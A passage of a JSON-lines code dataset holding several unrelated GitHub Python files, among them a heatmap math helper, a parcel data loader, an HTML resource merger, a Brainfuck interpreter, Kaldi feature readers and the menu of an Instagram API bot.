break\n","repo_name":"aswinsn/data_bot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74721835772","text":"import numpy as np\n\n\ndef relative_average_coordinate(heatmap, axis, weight_exponent=4):\n if isinstance(axis, tuple):\n return tuple(\n relative_average_coordinate(heatmap, axis=a, weight_exponent=weight_exponent)\n for a in axis\n )\n other = tuple(i for i in range(len(heatmap.shape)) if i != axis)\n weights = heatmap.sum(axis=other) ** weight_exponent\n value, step = np.linspace(0, 1, weights.shape[0], endpoint=False, retstep=True)\n value += step / 2\n return (value * weights).sum() / weights.sum()\n\n\ndef accumulate(accumulated, current, accumulated_weight=1):\n if accumulated is None:\n return current\n return (accumulated * accumulated_weight + current) / (accumulated_weight + 1)\n","repo_name":"bm371613/gest","sub_path":"gest/math.py","file_name":"math.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"78"} +{"seq_id":"36770956979","text":"def translate(text: str) -> str:\n result=''\n vowels=\"aeiouy\"\n while (text!=\"\"):\n result+=text[0]\n if text[0] in vowels:\n text=text[3:]\n elif text[0]==\" \":\n text=text[1:]\n else:\n text=text[2:]\n return result\n\n\nprint(\"Example:\")\nprint(translate(\"hieeelalaooo\"))","repo_name":"MiracleX77/CheckIO","sub_path":"Scientific Expedition/Bird Language.py","file_name":"Bird Language.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"559871814","text":"from os_engine_helper import OSEngineHelper\nfrom ceda_markup.opensearch.query import create_query\nfrom ceda_markup.opensearch.os_request import create_osdescription\nfrom xml.etree.ElementTree import tostring\nfrom xml.dom import minidom\n\n \n\nclass OSEngine(object):\n \"\"\"\n - :ref:`OSQuery <ceda_markup.opensearch.osquery.OSQuery>` **os_query**\n an OSQuery instance\n - :ref:`OSEngineResponse <ceda_markup.opensearch.template.osresponse.OSEngineResponse>` **os_responses**\n a list of OSEngineResponse instances\n - :ref:`OpenSearchDescription <ceda_markup.opensearch.os_response.OpenSearchDescription>` **os_description**\n an OpenSearchDescription instance \n - string **ospath**\n the URL where the OpenSearch service is hosted\n - :ref:`OSEngineHelper <ceda_markup.opensearch.os_engine_helper.OSEngineHelper>` **os_engine_helper**\n to write\n \"\"\"\n\n def __init__(self, os_query, os_responses, os_description, os_engine_helper = None):\n\n self.os_query = os_query\n self.os_responses = os_responses\n self.os_description = os_description \n self.os_engine_helper = os_engine_helper\n if os_engine_helper is None:\n self.os_engine_helper = OSEngineHelper()\n self.os_host_url = 'http://localhost' \n \n def do_search(self, host_url, mimetype, context):\n \"\"\"\n Executes the Opensearch call.\n Returns a response in the required mimetype or None if the mimetype is not supported \n \n - string **os_host_url** \n the opensearch engine URL\n - string **mimetype** \n the desired mimetype output\n - dict **context** \n a dictionary containing all the necessary information to exploit the request \n \"\"\"\n self.os_host_url = host_url\n response = None\n for item in self.os_responses:\n if item.extension == mimetype:\n response = item\n if response is not None:\n query = create_query(mimetype, self.os_query.params_model, context)\n result = self.os_query.do_search(query, context)\n packaged_results = response.digest_search_results(result, context)\n return response.generate_response(packaged_results, query, \\\n self.os_host_url, \\\n self.os_query.params_model, \\\n context)\n return None \n \n def get_description(self, ospath):\n \"\"\"\n Returns a string representation of the `OpenSearchDescription <http://www.opensearch.org/Specifications/OpenSearch/1.1#OpenSearch_description_document>`_ element\n \n - string ospath\n The engine host URL\n \"\"\"\n req_doc = create_osdescription(self.os_responses, self.os_description, self.os_query, ospath)\n self.os_engine_helper.additional_description(req_doc)\n reparsed = minidom.parseString(tostring(req_doc))\n return reparsed.toprettyxml(indent=\" \")\n\n def create_query_dictionary(self):\n ''' \n Returns a dictionary having as keys the query parameters. This method is \n supposed to be used as utility to migrate the request parameters from the \n http request to an internal neutral (not any django QueryDict) dictionary.\n ''' \n ret = {}\n for param in self.os_query.params_model:\n ret[param.par_name] = None\n return ret \n","repo_name":"kusamau/cedaMarkup","sub_path":"ceda_markup/opensearch/os_engine.py","file_name":"os_engine.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18431295564","text":"import pandas as pd\nimport pathlib\n\nDATA_DIR = pathlib.Path(__file__).parent.parent.joinpath(\"data\", \"raw\")\n\nPARCEL_DATE_COLS = ((\"DateToOwner\", r\"%m/%d/%Y\"), (\"AppraisalDate\", r\"%Y-%m-%d\"))\n\nPARCEL_FILE_COLS = [\n (25, 0, \"ParcelNum\", str),\n (25, 1, \"LocalParcelNum\", str),\n (4, 2, \"TownshipNum\", int),\n (3, 3, \"LocalTaxDistrictNum\", str),\n (3, 4, \"StateTaxDistrictNum\", int),\n (8, 5, \"SectionPlat\", str),\n (25, 6, \"RoutingNum\", str),\n (60, 7, \"PropAddress\", str),\n (30, 8, \"PropCity\", str),\n (10, 9, \"PropZIP\", str),\n (3, 10, \"PropClass\", str),\n (12, 11, \"NeighID\", str),\n (5, 12, \"NeighFactor\", float),\n (5, 13, \"AdjFactorLand\", float),\n (5, 14, \"AdjFactorImprovements\", float),\n (80, 15, \"Owner\", str),\n (60, 16, \"OwnerAddress\", str),\n (30, 17, \"OwnerCity\", str),\n (30, 18, \"OwnerState\", str),\n (10, 19, \"OwnerPostal\", str),\n (3, 20, \"OwnerCountry\", str),\n (10, 21, \"DateToOwner\", None),\n (1, 22, \"Level\", str),\n (1, 23, \"High\", str),\n (1, 24, \"Low\", str),\n (1, 25, \"Rolling\", str),\n (1, 26, \"Swampy\", str),\n (1, 27, \"Water\", str),\n (1, 28, \"Sewer\", str),\n (1, 29, \"Gas\", str),\n (1, 30, \"Electricity\", str),\n (1, 31, \"StreetCode\", str),\n (1, 32, \"Sidewalk\", str),\n (1, 33, \"Alley\", str),\n (1, 34, \"NeighType\", str),\n (3, 35, \"WaterPropType\", str),\n (5, 36, \"Zoning\", str),\n (1, 37, \"FloodHazard\", str),\n (12, 38, \"ValueLand\", float),\n (12, 39, \"ValueImprove\", float),\n (12, 40, \"ValueTotal\", float),\n (12, 41, \"AdjustmentLand\", float),\n (12, 42, \"AdjustmentImprove\", float),\n (12, 43, \"AdjustmentFarm\", float),\n (12, 44, \"ValueLandBreaker\", float),\n (12, 45, \"ValueImproveBreaker\", float),\n (12, 46, \"ValueNonHomeLandBreaker\", float),\n (12, 47, \"ValueNonHomeImprBreaker\", float),\n (12, 48, \"ValueAptLand\", float),\n (12, 49, \"ValueAptImpr\", float),\n (12, 50, \"ValueCareLandBreaker\", float),\n (12, 51, \"ValueCareImproveBreaker\", float),\n (12, 52, \"ValueFarmBreaker\", float),\n (12, 53, \"ValueMobileBreaker\", float),\n (12, 54, \"Land3Breaker\", float),\n (12, 55, \"Improve3Breaker\", float),\n (12, 56, \"ClassifiedLand\", float),\n (12, 57, \"DeededAcreage\", float),\n (10, 58, \"AppraisalDate\", None),\n (2, 59, \"ReasonCodeChange\", str),\n (12, 60, \"PriorValueLand\", float),\n (12, 61, \"PriorImprove\", float),\n (5, 62, \"AdjustmentFactor\", float),\n (500, 63, \"LegalDescription\", str),\n (1, 64, \"Anonymous\", str),\n (12, 65, \"CurrentValueLand\", float),\n (12, 66, \"CurrentValueImprove\", float),\n (12, 67, \"CurrentValueTotal\", float),\n]\n\n\ndef load_parcel_file():\n \"\"\"Load parcel file\n\n Returns\n -------\n df : pd.DataFrame\n DataFrame containing data on parcels\n \"\"\"\n # real_fname = f\"RealParcel_{county}_18_2018P2019.txt\"\n\n fname_stem = f\"RealParcel_\"\n ext = \".txt\"\n\n dtypes = {x[2]: x[3] for x in PARCEL_FILE_COLS if x[3] is not None}\n date_cols = tuple(x[1] for x in PARCEL_FILE_COLS if x[3] is None)\n col_widths = list(x[0] for x in PARCEL_FILE_COLS)\n col_names = list(x[2] for x in PARCEL_FILE_COLS)\n\n df = pd.concat(\n [\n pd.read_fwf(\n DATA_DIR.joinpath(fname),\n widths=col_widths,\n names=col_names,\n skipfooter=1,\n dtypes=dtypes,\n # infer_date_cols=date_cols,\n skiprows=1,\n )\n for fname in DATA_DIR.glob(f\"{fname_stem}*{ext}\")\n ]\n )\n\n for col, fmt in PARCEL_DATE_COLS:\n df.loc[:, col] = pd.to_datetime(df.loc[:, col], format=fmt)\n return df\n\n\nif __name__ == \"__main__\":\n\n df = load_parcel_file()\n\n print(\" \")\n","repo_name":"ajkluber/Property-Analysis","sub_path":"src/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19703894275","text":"#!/usr/bin/env python3\n\"\"\"Element Tree for Hyper Text Legacy File Converter\"\"\" \n\nimport os.path\nimport lxml.etree\nimport io\nimport mimetypes\nimport base64\nimport html\nimport importlib.resources\n\nfrom htlfc.agents import codecs\n\nclass ET():\n \"\"\"Upon init, convert the primary HTML into an element tree (ET)\n and append to self.forest[]\n Subsequent calls are required as follows...\n find_iframes() append self.forest[]\n cascade() merge styles CSS inline - repeat until all done\n substitute() merge external files into the ET\n merge_iframes() merge external iframes into the ET\n Finally...\n write_file() write the ET back to a file\n \"\"\"\n def __init__(self, filepath):\n self.forest = list() # of (filepath,etree,encoding)\n self.parser = lxml.etree.HTMLParser()\n self.__new_tree(filepath)\n\n def __new_tree(self,filepath):\n \"\"\"Decode and parse html file. Append to self.forest\n filepath:str\n return@success etree\n \"\"\"\n try:\n content,encoding = codecs.get_text(filepath)\n except EOFError as err:\n raise RuntimeError(f\"File is empty: {filepath}\")\n else:\n etree = lxml.etree.parse(io.StringIO(content),self.parser)\n self.forest.append((filepath,etree,encoding))\n return etree\n\n def find_iframes(self,manifest):\n \"\"\"Search for frames in manifest\n store found frames in self.frames and self.forest\n \"\"\"\n # search for frames\n self.frames = dict()\n for datapath,filepath in manifest.items() :\n extension = os.path.splitext(filepath)[1].lower()\n if extension in ['.htm','.html','.shtml'] :\n self.frames.update({datapath:filepath})\n\n def _find_a_frame(etree,depth):\n \"\"\"Search for frames at this level, if found:\n - append to self.forest\n - invoke itself against the found frame\n \"\"\"\n tag = './/*iframe' # XPath for a tag\n for element in etree.findall(tag):\n path = element.get('src')\n if path is None: continue\n for datapath,filepath in self.frames.items():\n if path == datapath:\n for filepath1,_,_ in self.forest :\n if filepath == filepath1 : continue # duplicate\n new_etree = self.__new_tree(filepath)\n _find_a_frame(new_etree ,depth+1) # recurse\n return\n\n # add frames for primary etree and recurse for every file that is added\n _,primary,_ = self.forest[0]\n _find_a_frame(primary,0)\n\n def add_info_bar(self,metadata):\n \"\"\"Add an info bar across the top of page\n metadata:dict\n metadata['timestamp']:str\n metadata['url']:str\n \"\"\"\n head = self.forest[0][1].find(\"head\")\n if head is None: # add <head> element to root\n root = self.forest[0][1].getroot()\n head = lxml.etree.fromstring('<head/>')\n root.insert(0,head)\n with importlib.resources.open_text(\"htlfc.merger\", \"infobar.css\") as fp:\n info_css = lxml.etree.fromstring(fp.read())\n head.append(info_css)\n body = self.forest[0][1].find(\"body\")\n if body is not None:\n if 'url' in metadata:\n info_text = f\"[{metadata['url']}]\"\n else:\n info_text = \"\"\n if 'timestamp' in metadata:\n info_text += f\" {metadata['timestamp']}\"\n info_text = html.escape(info_text) # eg symbols like \"&\"\n info = lxml.etree.fromstring(f'<div class=\"info_bar\">{info_text}</div>')\n body.insert(0,info)\n\n def cascade(self,datapath,filepath):\n \"\"\"Look for included styles and replace with in-line text\n datapath:str = path to a style object as it appears within the HTML\n filepath:str = path to a style object in local storage\n return@success = count\n count:int = how many matches were found and replaced\n \"\"\"\n count = 0\n\n # looking for attribute href=\"datapath\" when used with stylesheet\n attribute = './/*[@href=\"{}\"]'.format(datapath) # XPath for an attribute\n for _,etree,_ in self.forest:\n for element in etree.findall(attribute):\n if filepath.lower().endswith('.css'):\n element.attrib.pop('href')\n element.tag = 'style' # may have been 'link'\n newtext = self.__file2text(filepath)\n element.text = newtext\n count += 1\n\n # looking for tag style with text \"import url()\"\n pattern = '@import url(\"{}\");'.format(datapath)\n tag = './/*style' # XPath for a tag\n for _,etree,_ in self.forest:\n for element in etree.findall(tag):\n if element.text is None : continue\n if element.text.find(pattern) > 0 :\n newtext = self.__file2text(filepath)\n element.text = element.text.replace(pattern,newtext)\n count += 1\n\n # looking for tag <style> with text url(\"itemname\")\n pattern = 'url(\"{}\")'.format(datapath)\n tag='.//*style' # XPath for a tag\n for _,etree,_ in self.forest:\n for element in etree.findall(tag):\n if element.text is None : continue\n if element.text.find(pattern) > 0 :\n newtext = 'url({})'.format(self.__file2text(filepath))\n element.text = element.text.replace(pattern,newtext)\n count += 1\n\n return count\n\n def substitute(self,datapath,filepath):\n \"\"\"Look for included objects and replace with uri\n datapath:str = path to an object as it appears within the HTML\n filepath:str = path to an object in local storage, to be converted to text\n return@success : warnings\n warnings:list of warning, if none then empty list\n warning:str = message due to failure to convert object at filepath\n \"\"\"\n warnings = list()\n patterns = ['url({})'.format(datapath)]\n patterns.append('url(\"{}\")'.format(datapath))\n\n for _,etree,_ in self.forest:\n for element in etree.iter():\n # looking for attribute src=\"datapath\"\n src = element.attrib.get('src')\n if src == datapath:\n # src=script becomes text of the element\n if element.tag == 'script':\n element.text = self.__file2uri(filepath)\n del element.attrib['src']\n elif element.tag == 'iframe':\n continue # defer until merge_iframes()\n else:\n element.attrib['src'] = self.__file2uri(filepath)\n\n # looking for attribute background=\"datapath\"\n src = element.attrib.get('background')\n if src == datapath:\n newtext = self.__file2uri(filepath)\n element.attrib['background'] = newtext\n\n # looking for url(datapath) in the attribute style\n if element.attrib.get('style'):\n for pattern in patterns:\n if pattern in element.attrib[\"style\"]:\n newtext = 'url({})'.format(self.__file2uri(filepath))\n element.attrib[\"style\"] = element.attrib[\"style\"].replace(pattern,newtext)\n \n # looking for url(\"datapath\") in any text\n if element.text is None : continue\n for pattern in patterns:\n if element.text.find(pattern) > 0 :\n newtext = 'url({})'.format(self.__file2uri(filepath))\n element.text = element.text.replace(pattern,newtext)\n\n return warnings\n\n def __file2uri(self,filepath):\n \"\"\"Helper function to convert a file at filepath\n into its text representation\n Exceptions are converted to RuntimeWarning\n \"\"\"\n if os.path.getsize(filepath) == 0:\n raise RuntimeWarning(f\"File is empty: {filepath}\")\n uri = ['data:']\n mimetype,_ = mimetypes.guess_type(filepath, strict = False)\n # when the extension is missing, mimetypes will fail\n if mimetype is None: mimetype = 'application/octet-stream'\n uri.append(mimetype)\n uri.append(\";base64,\")\n try:\n with open(filepath,'rb') as fp:\n data = fp.read()\n encoded = base64.b64encode(data)\n except Exception as err:\n raise RuntimeWarning(f\"b64encode error {err} | from: {filepath}\")\n else:\n uri.append(encoded.decode(\"utf-8\"))\n return ''.join(uri)\n\n def __file2text(self,filepath):\n \"\"\"Helper function to convert any document\n at filepath into text\n Exceptions are converted to RuntimeWarning\n \"\"\"\n if os.path.getsize(filepath) == 0:\n filename = os.path.basename(filepath)\n raise RuntimeWarning(f\"File is empty: {filename}\")\n text,_ = codecs.get_text(filepath)\n return text\n\n def merge_iframes(self):\n \"\"\"Reduce all etrees to one\"\"\"\n _,tree,encoding = self.forest[0] # primary etree\n tag = './/*iframe' # XPath for a tag\n\n # Looking for level 1 iframes...\n for element1 in tree.findall(tag):\n datapath1 = element1.get('src')\n if datapath1 is None: continue\n if datapath1 in self.frames:\n target1 = self.frames[datapath1]\n else: continue\n # ignore [0] because it is the primary etree...\n for filepath1,etree1,encoding1 in self.forest[1:]:\n if filepath1 == target1:\n\n # Looking for level 2 iframes...\n for element2 in etree1.findall(tag):\n datapath2 = element2.get('src')\n if datapath2 is None: continue\n if datapath2 in self.frames:\n target2 = self.frames[datapath2]\n else: continue\n for filepath2,etree2,encoding2 in self.forest[1:]:\n if filepath2 == target2:\n\n # Looking for level 3 iframes...\n for element3 in etree2.findall(tag):\n datapath3= element3.get('src')\n if datapath3 is None: continue\n if datapath3 in self.frames:\n target3 = self.frames[datapath3]\n else: continue\n for filepath3,etree3,encoding3 in self.forest[1:]:\n if filepath3 == target3:\n raise RuntimeError(\"Level three iframe was found but is not supported\")\n # Found level 2 iframe...\n if encoding2 is None:\n frame_text2 = lxml.etree.tostring(etree2\n ,method = 'html')\n frame_text2 = frame_text2.decode()\n else:\n frame_text2 = lxml.etree.tostring(etree2\n ,encoding = encoding2\n ,method = 'html')\n frame_text2 = frame_text2.decode(encoding2)\n # Merge into tree\n # replace src=\"..path..\"\n # with srcdoc='..inline..' (single quotes)\n del element2.attrib['src']\n element2.set('srcdoc',frame_text2)\n\n # Found level 1 iframe...\n if encoding1 is None:\n frame_text1 = lxml.etree.tostring(etree1\n ,method = 'html')\n frame_text1 = frame_text1.decode()\n else:\n frame_text1 = lxml.etree.tostring(etree1\n ,encoding = encoding1\n ,method = 'html')\n frame_text1 = frame_text1.decode(encoding1)\n # Merge into tree\n # replace src=\"..path..\"\n # with srcdoc=\"..inline..\" (double quotes)\n del element1.attrib['src']\n element1.set('srcdoc',frame_text1)\n\n def write_file(self,filepath):\n \"\"\"Serialize the Etree\n filepath:str = path to output file\n \"\"\"\n _,etree,encoding = self.forest[0]\n kwargs = { 'method':'html' } # args for tostring()\n if encoding is not None:\n kwargs['encoding'] = encoding\n result = lxml.etree.tostring(etree,**kwargs)\n with open(filepath,'wb') as fp:\n fp.write(result)\n\n","repo_name":"HairySpoon/htlfc","sub_path":"src/htlfc/merger/xmltree.py","file_name":"xmltree.py","file_ext":"py","file_size_in_byte":13380,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"3229131851","text":"CHARACTERS = [\"+\", \"-\", \"<\", \">\", \"[\", \"]\", \".\", \",\", \"*\"]\nDISPLAY = False\n\n\ndef display(memory, command=\"\"):\n if DISPLAY:\n for val in memory.tape:\n print(\"|\", val, \"|\", end=\"\")\n print()\n print(\" \" * memory.pointer + \" ^\")\n print(\" \" * memory.pointer + \" |\")\n print(\" \" * memory.pointer + \" \" + command)\n print()\n input()\n\n\nclass Memory:\n def __init__(self, tape=[0], pointer=0):\n self.tape = tape\n self.pointer = pointer\n self.input_buffer = []\n\n\nclass Compiler:\n def __init__(self, code, memory=Memory()):\n self.memory = memory\n self.code = code\n\n def run(self):\n while len(self.code) > 0:\n command = self.code[0]\n display(self.memory, command)\n self.code = self.code[1:]\n if command == CHARACTERS[0]:\n self.plus()\n elif command == CHARACTERS[1]:\n self.minus()\n elif command == CHARACTERS[2]:\n self.left()\n elif command == CHARACTERS[3]:\n self.right()\n elif command == CHARACTERS[4]:\n self.open()\n elif command == CHARACTERS[5]:\n self.close()\n elif command == CHARACTERS[6]:\n self.write()\n elif command == CHARACTERS[7]:\n self.read()\n elif command == CHARACTERS[8]:\n global DISPLAY\n DISPLAY = not DISPLAY\n else:\n raise NotImplementedError(command)\n return self.memory.tape, self.memory.pointer\n\n def plus(self):\n self.memory.tape[self.memory.pointer] += 1\n\n def minus(self):\n self.memory.tape[self.memory.pointer] -= 1\n\n def left(self):\n if self.memory.pointer >= 0:\n self.memory.pointer -= 1\n else:\n raise IndexError(\"pointer can not go below 0\")\n\n def right(self):\n if self.memory.pointer + 1 == len(self.memory.tape):\n self.memory.tape.append(0)\n self.memory.pointer += 1\n\n def open(self):\n depth = 0\n for i in range(len(self.code)):\n char = self.code[i]\n if char == CHARACTERS[4]:\n depth += 1\n elif char == CHARACTERS[5]:\n depth -= 1\n if depth == -1:\n while self.memory.tape[self.memory.pointer] is not 0:\n nested_code = Compiler(self.code[:i], self.memory)\n nested_code.run()\n self.code = self.code[i:]\n break\n else:\n raise RuntimeError(CHARACTERS[5] + \" not found for \" + CHARACTERS[4])\n\n def close(self):\n return\n # raise RuntimeError(CHARACTERS[4] + \" not found for \" + CHARACTERS[5])\n\n def write(self):\n val = self.memory.tape[self.memory.pointer]\n if val == 10:\n print()\n else:\n print(chr(val), end=\"\")\n\n def read(self):\n if len(self.memory.input_buffer) == 0:\n self.memory.input_buffer = [ord(character) for character in input()]\n self.memory.input_buffer.append(10)\n num = self.memory.input_buffer[0]\n self.memory.input_buffer = self.memory.input_buffer[1:]\n self.memory.tape[self.memory.pointer] = num\n\n\nif __name__ == \"__main__\":\n with open('brainF.txt', 'r') as file:\n raw = file.read()\n\n pure_code = ''.join([i for i in raw if i in CHARACTERS])\n\n print(pure_code)\n\n compiler = Compiler(pure_code)\n print(compiler.run())\n","repo_name":"cmcahoon01/C-Compiler","sub_path":"brainRunner.py","file_name":"brainRunner.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20908196586","text":"import inspect\nimport logging\nfrom dataclasses import dataclass\nfrom types import FrameType, TracebackType\nfrom typing import Dict, List, Optional, Type\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass ExceptionInfo:\n \"\"\"Corresponds to the return value from sys.exc_info().\"\"\"\n type_exception: Type[BaseException]\n exception: BaseException\n traceback: Optional[TracebackType]\n\n\n@dataclass\nclass TracebackFramesParsingResult:\n frames: List[FrameType]\n have_all_frames_been_parsed: bool\n\n\ndef exc_info_to_dict(exc_info: ExceptionInfo):\n \"\"\"\n Transform exc_info from sys.exc_info() to dict.\n :param exc_info: exc_info with type ExceptionInfo.\n :return:\n Dict{\n error: error class,\n error_message: message provided with error,\n traceback: list of frames in dict format\n * traceback_parsing_warning: shown if there is a warning about the huge amount of trace frames\n }\n * - optional output\n \"\"\"\n tb_frames_parsing_result = _get_traceback_frames(exc_info.traceback) if \\\n exc_info.traceback else TracebackFramesParsingResult(frames=[],\n have_all_frames_been_parsed=True)\n\n traceback = list(map(_frame_to_dict, tb_frames_parsing_result.frames))\n exc_info_dict = {\n 'error': exc_info.type_exception.__name__,\n 'error_message': str(exc_info.exception),\n 'traceback': traceback\n }\n if not tb_frames_parsing_result.have_all_frames_been_parsed:\n exc_info_dict |= {'traceback_parsing_warning': 'There are too many frames in the traceback object. '\n 'You only see the first ones available. '\n 'The rest are not displayed in the logs'}\n\n return exc_info_dict\n\n\ndef _get_traceback_frames(traceback: TracebackType, max_frames_amount=100) -> \\\n TracebackFramesParsingResult:\n \"\"\"\n Gets all frames from traceback.\n :param traceback: traceback with type TracebackType.\n :param max_frames_amount: max amount of frames in the traceback.\n :return: dataclass TracebackFramesParsingResult that includes list of frames and\n information about if all traceback frames have been parsed.\n \"\"\"\n frames: List[FrameType] = []\n while traceback is not None:\n frames.append(traceback.tb_frame)\n traceback = traceback.tb_next\n if len(frames) >= max_frames_amount:\n return TracebackFramesParsingResult(frames=frames,\n have_all_frames_been_parsed=False)\n return TracebackFramesParsingResult(frames=frames,\n have_all_frames_been_parsed=True)\n\n\ndef _frame_to_dict(frame: FrameType) -> Dict[str, str]:\n \"\"\"\n Transform frame with type FrameType to dict.\n P.S. Transfer from frame info only filename, lineno, function, code_context attributes!\n :param frame: frame with type FrameType\n :return:\n Dict{\n 'filename': corresponds to inspect.FrameInfo.filename,\n 'lineno': corresponds to inspect.FrameInfo.lineno,\n 'function': corresponds to inspect.FrameInfo.function,\n 'code_context': corresponds to inspect.FrameInfo.code_context\n }\n \"\"\"\n frame_info = inspect.getframeinfo(frame)\n return {\n 'filename': frame_info.filename,\n 'lineno': frame_info.lineno,\n 'function': frame_info.function,\n 'code_context': [ctx_line.strip().replace('\\n', '')\n for ctx_line in frame_info.code_context]\n }\n","repo_name":"mild-blue/txmatching","sub_path":"txmatching/web/web_utils/traceback_formatters.py","file_name":"traceback_formatters.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"13660432608","text":"#!/usr/bin/python3\n\ntests = int(input())\n\nfor i in range(tests):\n ln = int(input())\n res = []\n def backtrack(cur, left):\n if left == 0:\n res.append(cur)\n return\n for i in ['6','8']:\n backtrack(cur+ i,left-1)\n backtrack(\"\",ln)\n print(len(res))\n print(\" \".join(res))\n","repo_name":"ptit-mo/code","sub_path":"dsa/thilan1/so_loc_phat.py","file_name":"so_loc_phat.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6436908491","text":"import kaldi_io\nimport numpy as np\n\ndef read_all_data(feat_scp):\n feat_fid = open(feat_scp, 'r')\n feat = feat_fid.readlines()\n feat_fid.close()\n mat_list = []\n\n for i in range(len(feat)):\n _, ark = feat[i].split()\n mat = kaldi_io.read_mat(ark)\n mat_list.append(mat)\n return np.concatenate(mat_list, axis=0)\n\ndef read_feats_and_targets(feat_scp, text_file):\n feat_fid = open(feat_scp, 'r')\n text_fid = open(text_file, 'r')\n feat = feat_fid.readlines()\n text = text_fid.readlines()\n feat_fid.close()\n text_fid.close()\n assert(len(feat) == len(text))\n dict_utt2feat = {}\n dict_target2utt = {}\n for i in range(len(feat)):\n utt_id1, ark = feat[i].strip('\\n').split(' ')\n utt_id2, target = text[i].strip('\\n').split(' ')\n dict_utt2feat[utt_id1] = ark\n if target in dict_target2utt.keys():\n dict_target2utt[target].append(utt_id2)\n else:\n dict_target2utt[target] = [utt_id2]\n return dict_utt2feat, dict_target2utt\n\ndef get_feats(target, dic_utt2feat, dict_target2utt):\n \"\"\" Read feats for a specific target\n :param target: char, '0', '1', ..., '9', o'\n :param dict_utt2feat: utterance to feat dictionary\n :param dict_target2utt: target to utterance dictionary\n :return: feature matrix for this target, num_samples * feature dim\n \"\"\"\n mat_list = []\n for utt in dict_target2utt[target]:\n ark = dic_utt2feat[utt]\n mat = kaldi_io.read_mat(ark)\n mat_list.append(mat)\n return np.concatenate(mat_list, axis=0)\n\n","repo_name":"nwpuaslp/ASR_Course","sub_path":"03-GMM-EM/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"78"} +{"seq_id":"38880003189","text":"from Self_info import self_info\nfrom Get_own_post import get_own_post\nfrom Get_user_id import get_user_id\nfrom Get_user_info import get_user_info\nfrom Get_user_post_info import get_user_post_info\nfrom Like_a_post import like_a_post\nfrom Post_a_comment import post_a_comment\nfrom Recent_liked_pic import user_post_like_by_me\nfrom Get_all_posts_of_user import get_all_posts\nfrom Most_commented_own_post import most_commented_post\nfrom Most_liked_own_post import most_liked_post\nfrom Most_commented_user_post import most_commented_user_post\nfrom Most_liked_user_post import most_liked_user_post\nfrom Pie_chart import pie_chart\nfrom Caption import caption_comment\nfrom Friend_list import userName,friend_list\n\n\n\n\n\n#--------------------------------------------------MAIN FUNCTION---------------------------------------#\ndef main():\n var = True\n\n while var :\n print(\"---------------------------------------------------------------------------------------------------------\")\n print(\" What do you want to do ?.\\n 1.Self-information...\\n 2.Get own-post...\\n 3.Get user-id...\\n 4.Get user-info...\\n 5.Get user recent post-info...\\n 6.Like a user-post...\\n 7.Post a comment on user-id...\\n 8.Get the recent post liked by you of the other user...\\n 9.Download all posts of other user...\\n 10.Download the most commented own post...\\n 11.Download most liked own post...\\n 12.Download the most commented user's post...\\n 13.Download the most liked user's post...\\n 14.Draw a pie-chat of all -ve and +ve comments of own post...\\n 15.Targeted comments based on user's post caption...\\n 16.Exit...\"\n \"\")\n get = (raw_input(\"Please enter your choice : \"))\n while get.isdigit() is not True:\n get = (raw_input(\"Please enter your choice : \"))\n get = int(get)\n while get <=0 or get >=17 :\n get = (raw_input(\"Please again enter your choice : \"))\n if get.isdigit():\n get = int(get)\n else:\n get = (raw_input(\"Please again enter your choice : \"))\n\n\n print(\"\\n\")\n if get == 1 :\n # ----getting my own info----#\n self_info()\n print(\"-----------------------------------------------------------------------------------------------------\")\n elif get == 2 :\n # ----getting my recent post info & saving it as(lakshay.jpg)----#\n get_own_post()\n print(\"-----------------------------------------------------------------------------------------------------\")\n elif get == 3 :\n\n username = userName() #---------CALLING AND GETTING USERNAME FROM USERNAME() FUNCTION-------#\n get_user_id(username)\n print(\"-----------------------------------------------------------------------------------------------------\")\n elif get == 4 :\n\n # -----getting user-INFO----#\n username = userName()\n\n get_user_info(username)\n print(\"-----------------------------------------------------------------------------------------------------\")\n elif get == 5 :\n\n # -----getting user recent-POST & saving it as (danish.jpg)------#\n username = userName()\n get_user_post_info(username)\n print(\"-----------------------------------------------------------------------------------------------------\")\n elif get == 6 :\n\n # -----give a like to user's recent post------#\n\n like_a_post()\n print(\"-----------------------------------------------------------------------------------------------------\")\n elif get == 7 :\n\n #------Hit a comment on user post----------#\n post_a_comment()\n elif get == 8 :\n #--------Get to know which recent pic is liked by me of the user & download it-------#\n user_post_like_by_me()\n elif get == 9 :\n\n #--------- Download the all posts of user--------#\n get_all_posts()\n elif get == 10 :\n #-------Download most commented own post-------#\n most_commented_post()\n elif get == 11 :\n #------- download most liked own post-------#\n most_liked_post()\n elif get == 12:\n\n #-------Download most commented user post--------#\n most_commented_user_post()\n elif get == 13 :\n\n #-------Download most liked user post-------#\n most_liked_user_post()\n elif get == 14 :\n #---------Get a pie chart---------#\n pie_chart()\n elif get == 15 :\n\n #-------Target a comment on user's post caption------#\n caption_comment()\n elif get == 16 :\n #--------Press 9 if u wanna terminate the program------#\n var = False\n print(\"-----------------------------------------------------------------------------------------------------\")\n\n else :\n print(\"Please enter a valid 